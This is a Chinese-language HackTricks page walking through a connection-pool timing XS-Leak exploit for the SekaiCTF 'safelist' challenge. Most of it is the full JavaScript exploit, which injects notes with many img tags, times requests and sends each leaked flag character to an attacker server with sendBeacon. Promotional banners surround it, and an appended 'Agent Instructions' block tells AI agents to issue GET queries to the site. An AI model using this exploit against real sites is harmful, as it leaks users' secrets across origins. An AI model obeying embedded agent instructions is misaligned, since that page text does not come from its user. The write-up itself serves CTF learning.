# Connection Pool by Destination Example

<details>

<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>

* 您在**网络安全公司**工作吗？ 您想看到您的**公司在HackTricks中做广告**吗？ 或者您想访问**PEASS的最新版本或下载PDF格式的HackTricks**吗？ 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[NFT收藏品](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks)**和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)**提交PR来分享您的黑客技巧**。

</details>

在[**这个利用**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-safelist-html)中，[**@terjanq**](https://twitter.com/terjanq)提出了另一种解决方案，用于下一页中提到的挑战：

{% content-ref url="connection-pool-by-destination-example" %}
[connection-pool-by-destination-example](https://hacktricks.xsx.tw/pentesting-web/xs-search/connection-pool-by-destination-example)
{% endcontent-ref %}

让我们看看这个利用是如何工作的：

* 攻击者将注入一个带有尽可能多的\*\*`<img`**标签加载**`/js/purify.js`\*\*的注释（超过6个以阻止来源）。
* 然后，攻击者将**删除**索引为1的**注释**。
* 然后，攻击者将\[使**机器人访问页面**以触发剩余注释]并将发送一个对\*\*`victim.com/js/purify.js`**的**请求\*\*，然后将**计时**。
* 如果时间**更长**，则注入在**剩余注释**中，如果时间**更短**，则标志在其中。

{% hint style="info" %}
说实话，阅读脚本时，我错过了**攻击者让机器人加载页面以触发img标签**的某些部分，我在代码中没有看到类似的内容
{% endhint %}

\`\`\`html const SITE\_URL = '<https://safelist.ctf.sekai.team/>'; const PING\_URL = '<https://myserver>'; function timeScript(){ return new Promise(resolve => { var x = document.createElement('script'); x.src = '<https://safelist.ctf.sekai.team/js/purify.js>?' + Math.random(); var start = Date.now(); x.onerror = () => { console.log(\`Time: ${Date.now() - start}\`); //Time request resolve(Date.now() - start); x.remove(); } document.body.appendChild(x); }); } add\_note = async (note) => { let x = document.createElement('form') x.action = SITE\_URL + "create" x.method = "POST" x.target = "xxx"

let i = document.createElement("input"); i.type = "text" i.name = "text" i.value = note x.appendChild(i) document.body.appendChild(x) x.submit() }

remove\_note = async (note\_id) => { let x = document.createElement('form') x.action = SITE\_URL+"remove" x.method = "POST" x.target = "\_blank"

let i = document.createElement("input"); i.type = "text" i.name = "index" i.value = note\_id x.appendChild(i) document.body.appendChild(x) x.submit() }

const sleep = ms => new Promise(resolve => setTimeout(resolve, ms)); // }zyxwvutsrqponmlkjihgfedcba\_ const alphabet = 'zyxwvutsrqponmlkjihgfedcba\_' var prefix = 'SEKAI{xsleakyay'; const TIMEOUT = 500; async function checkLetter(letter){ // Chrome puts a limit of 6 concurrent request to the same origin. We are creating a lot of images pointing to purify.js // Depending whether we found flag's letter it will either load the images or not. // With timing, we can detect whether Chrome is processing purify.js or not from our site and hence leak the flag char by char. const payload = `${prefix}${letter}` + Array.from(Array(78)).map((e,i)=>`<img/src=/js/purify.js?${i}>`).join(''); await add\_note(payload); await sleep(TIMEOUT); await timeScript(); await remove\_note(1); //Now, only the note with the flag or with the injection existsh await sleep(TIMEOUT); const time = await timeScript(); //Find out how much a request to the same origin takes navigator.sendBeacon(PING\_URL, \[letter,time]); if(time>100){ return 1; } return 0; } window\.onload = async () => { navigator.sendBeacon(PING\_URL, 'start'); // doesnt work because we are removing flag after success. // while(1){ for(const letter of alphabet){ if(await checkLetter(letter)){ prefix += letter; navigator.sendBeacon(PING\_URL, prefix); break; } } // } };

```
<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS Red Team Expert）</strong></a><strong>！</strong></summary>

* 你在**网络安全公司**工作吗？想要看到你的**公司在HackTricks中被宣传**吗？或者想要获取**PEASS的最新版本或下载HackTricks的PDF**吗？查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[NFT收藏品](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **通过向[hacktricks仓库](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud仓库](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。

</details>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hacktricks.xsx.tw/pentesting-web/xs-search/connection-pool-by-destination-example.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.